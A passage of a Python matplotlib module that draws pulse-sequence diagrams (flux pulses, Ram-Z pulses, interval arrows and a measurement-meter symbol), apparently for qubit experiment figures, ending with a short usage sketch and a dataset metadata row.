color='C1', **plot_kws):
'''
Draw a smooth flux pulse, where the rising and falling edges are given by
Fermi-Dirac functions.
s: smoothness of edge
'''
x = np.linspace(pos, pos + width, 100)
y = amp / ((np.exp(-(x - (pos + 5.5 * s)) / s) + 1) *
(np.exp((x - (pos + width - 5.5 * s)) / s) + 1))
ax.fill_between(x, y+y_offs, color=color, alpha=0.3)
ax.plot(x, y+y_offs, color=color, **plot_kws)
if label is not None:
ax.text(pos + width / 2, labelHeight, label,
horizontalalignment='center', color=color)
return pos + width
def ramZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'):
'''
Draw a Ram-Z flux pulse, i.e. only part of the pulse is shaded, to indicate
cutting off the pulse at some time.
'''
xLeft = np.linspace(pos, pos + sep, 100)
xRight = np.linspace(pos + sep, pos + width, 100)
xFull = np.concatenate((xLeft, xRight))
y = amp / ((np.exp(-(xFull - (pos + 5.5 * s)) / s) + 1) *
(np.exp((xFull - (pos + width - 5.5 * s)) / s) + 1))
yLeft = y[:len(xLeft)]
ax.fill_between(xLeft, yLeft+y_offs, alpha=0.3, color=color, linewidth=0.0)
ax.plot(xFull, y+y_offs, color=color)
return pos + width
def modZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'):
'''
    Draw a modulated Z pulse. Placeholder: currently draws nothing and only
    returns the end position.
'''
return pos + width
def interval(ax, start, stop, y_offs = 0, height=1.5, label=None, labelHeight=None,
vlines=True, color='k', arrowstyle='<|-|>', **plot_kws):
'''
Draw an arrow to indicate an interval.
'''
if labelHeight is None:
labelHeight = height + 0.2
arrow = matplotlib.patches.FancyArrowPatch(
posA=(start, height+y_offs), posB=(stop, height+y_offs), arrowstyle=arrowstyle,
color=color, mutation_scale=7, **plot_kws)
ax.add_patch(arrow)
if vlines:
ax.plot([start, start], [0+y_offs, height+y_offs], '--', color=color, **plot_kws)
ax.plot([stop, stop], [0+y_offs, height+y_offs], '--', color=color, **plot_kws)
if label is not None:
ax.text((start + stop) / 2, labelHeight+y_offs, label, color=color,
horizontalalignment='center')
def interval_vertical(ax, start, stop, position, label=None, labelHeight=None,
color='k', arrowstyle='<|-|>', labeloffset: float = 0,
horizontalalignment='center'):
'''
Draw an arrow to indicate an interval.
'''
if labelHeight is None:
labelHeight = (start+stop)/2
arrow = matplotlib.patches.FancyArrowPatch(
posA=(position, start), posB=(position, stop), arrowstyle=arrowstyle,
color=color, mutation_scale=7)
ax.add_patch(arrow)
if label is not None:
ax.text(position+labeloffset, labelHeight, label, color=color,
horizontalalignment=horizontalalignment)
def meter(ax, x0, y0, y_offs=0, w=1.1, h=.8, color='black', fillcolor=None):
"""
Draws a measurement meter on the specified position.
"""
    if fillcolor is None:
fill = False
else:
fill = True
p1 = matplotlib.patches.Rectangle(
(x0-w/2, y0-h/2+y_offs), w, h, facecolor=fillcolor, edgecolor=color,
fill=fill, zorder=5)
ax.add_patch(p1)
p0 = matplotlib.patches.Wedge(
(x0, y0-h/4+y_offs), .4, theta1=40, theta2=180-40, color=color, lw=2,
width=.01, zorder=5)
ax.add_patch(p0)
ax.arrow(x0, y0-h/4+y_offs, dx=.5*np.cos(np.deg2rad(70)),
dy=.5*np.sin(np.deg2rad(60)), width=.03, color=color, zorder=5)
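# Usage sketch added for illustration; it is not part of the original module.
# It draws one microwave pulse followed by a flux pulse and labels the delay
# between them; figure size, labels and positions are arbitrary example values.
if __name__ == '__main__':
    fig, ax = new_pulse_fig((7, 2))
    pos = mwPulse(ax, 0, label='X90')
    fluxPulse(ax, pos + 1, label='flux')
    interval(ax, pos, pos + 1, label='delay')
    plt.show()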
| mit | -4,925,029,477,719,938,000 | 32.552147 | 89 | 0.585848 | false |